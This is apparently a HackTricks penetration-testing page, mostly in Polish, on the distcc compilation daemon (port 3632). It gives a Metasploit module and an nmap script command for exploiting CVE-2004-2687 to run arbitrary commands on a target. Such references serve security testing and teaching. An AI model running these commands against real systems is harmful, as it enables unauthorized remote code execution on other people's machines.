3.3 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Podstawowe informacje
Distcc to narzędzie, które poprawia proces kompilacji poprzez wykorzystanie nieużywanej mocy obliczeniowej innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje zadania kompilacji do innego systemu. Ten system odbierający musi mieć uruchomiony demon distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć wysłany kod.
Domyślny port: 3632
PORT STATE SERVICE
3632/tcp open distccd
Wykorzystanie
Sprawdź, czy jest podatny na CVE-2004-2687, aby wykonać dowolny kod:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Nie sądzę, żeby shodan wykrywał tę usługę.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.